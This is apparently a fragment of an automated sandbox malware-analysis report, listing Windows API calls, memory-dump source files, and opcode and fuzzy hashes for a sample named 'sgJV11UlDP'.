                                                                      • GetFileAttributesA.KERNEL32(007A0950,007A0950,007A0950,007A0950,007A0950,007A0950,00000000,007A0950,007A0950,?,?,?,004057D5,?), ref: 00405AD6
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.4075536589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.4075521092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075552184.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075573829.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075775056.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                      • String ID: Pz
                                                                      • API String ID: 3248276644-4075803849
                                                                      • Opcode ID: b64babd179512e018bab78e554f82c4544fddaf0e52df0fe8d8ef1bdd38ac3b2
                                                                      • Instruction ID: 48b42070403af27e20b1f5acdd7358d009e8e21f6fdf4bd1af3726bdd8170272
                                                                      • Opcode Fuzzy Hash: b64babd179512e018bab78e554f82c4544fddaf0e52df0fe8d8ef1bdd38ac3b2
                                                                      • Instruction Fuzzy Hash: 2AF0A421215D6216D622323A1C89A9F1A58CEC7364709073FF866B12D3EA3C89439DAE
                                                                      APIs
                                                                      • IsWindowVisible.USER32(?), ref: 004050B7
                                                                      • CallWindowProcA.USER32(?,?,?,?), ref: 00405108
                                                                        • Part of subcall function 004040C7: SendMessageA.USER32(?,?,00000000,00000000), ref: 004040D9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.4075536589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.4075521092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075552184.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075573829.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075775056.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: Window$CallMessageProcSendVisible
                                                                      • String ID:
                                                                      • API String ID: 3748168415-3916222277
                                                                      • Opcode ID: aa27df10419a993b06254c4634be6a0ab58901204a819692472b88ae61f90a6b
                                                                      • Instruction ID: b4a086d39c893e0b6e30c02e44c042f184afa5b73794f50f798247e01a256ddd
                                                                      • Opcode Fuzzy Hash: aa27df10419a993b06254c4634be6a0ab58901204a819692472b88ae61f90a6b
                                                                      • Instruction Fuzzy Hash: 5C018471200609EFDF204F11DD84A6F3665EB84314F208037F605B65D1CB7A8C52AFAD
                                                                      APIs
                                                                      • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,007A1EE0,(y,?,-000010B8,-000010B8,00000002,-000010B8,?,00406118,80000002), ref: 00405F1A
                                                                      • RegCloseKey.ADVAPI32(?,?,00406118,80000002,Software\Microsoft\Windows\CurrentVersion,-000010B8,007A1EE0,007A1EE0,?,0079ED28), ref: 00405F25
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.4075536589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.4075521092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075552184.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075573829.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075775056.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: CloseQueryValue
                                                                      • String ID: (y
                                                                      • API String ID: 3356406503-255812342
                                                                      • Opcode ID: fbc34f94f804cf7f8ceee3a94302c0ccfb61d5b85e95000fdd84f5b54f9224ff
                                                                      • Instruction ID: 2e4321f520f0c42760b8dd6c663e9e781067c597ec393d4c632fa8beed11a635
                                                                      • Opcode Fuzzy Hash: fbc34f94f804cf7f8ceee3a94302c0ccfb61d5b85e95000fdd84f5b54f9224ff
                                                                      • Instruction Fuzzy Hash: 3B019A7250020AAADF22CF20CC09FDB3BA8EF55360F00442AF904A2190D278CA54CFA8
                                                                      APIs
                                                                      • GetTickCount.KERNEL32 ref: 00405BC9
                                                                      • GetTempFileNameA.KERNEL32(?,?,00000000,?,?,00000006,00000008,0000000A), ref: 00405BE3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.4075536589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.4075521092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075552184.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075573829.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075775056.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: CountFileNameTempTick
                                                                      • String ID: nsa
                                                                      • API String ID: 1716503409-2209301699
                                                                      • Opcode ID: 81a8a72dc23b4af90602e2553ee1124644ae594fa0167b908fb3a738e8e2aa10
                                                                      • Instruction ID: d190f65444f006a88ba75eae1d2615f44ee573feb2fe82d01cd284afd59f947a
                                                                      • Opcode Fuzzy Hash: 81a8a72dc23b4af90602e2553ee1124644ae594fa0167b908fb3a738e8e2aa10
                                                                      • Instruction Fuzzy Hash: C1F082363042086BDB109F56DD04B9B7BA9DFA1750F10803BFA489A280D6B4E9558758
                                                                      APIs
                                                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D46,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFB
                                                                      • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405B13
                                                                      • CharNextA.USER32(00000000,?,00000000,00405D46,00000000,[Rename],00000000,00000000,00000000), ref: 00405B24
                                                                      • lstrlenA.KERNEL32(00000000,?,00000000,00405D46,00000000,[Rename],00000000,00000000,00000000), ref: 00405B2D
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.4075536589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.4075521092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075552184.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075573829.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075775056.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                                      • String ID:
                                                                      • API String ID: 190613189-0
                                                                      • Opcode ID: dddc0b46adaff912d9c321cf48e41736a02eed0190ef2a74250491e495455120
                                                                      • Instruction ID: c1544da0d971e4a519e78892e838bc28cfb462c10397de1a7bf1af1224e2ff03
                                                                      • Opcode Fuzzy Hash: dddc0b46adaff912d9c321cf48e41736a02eed0190ef2a74250491e495455120
                                                                      • Instruction Fuzzy Hash: 9CF06232105418BFC712DFA5DD40D9EBBB8DF56250B2540BAE840F7251D674FE019BA9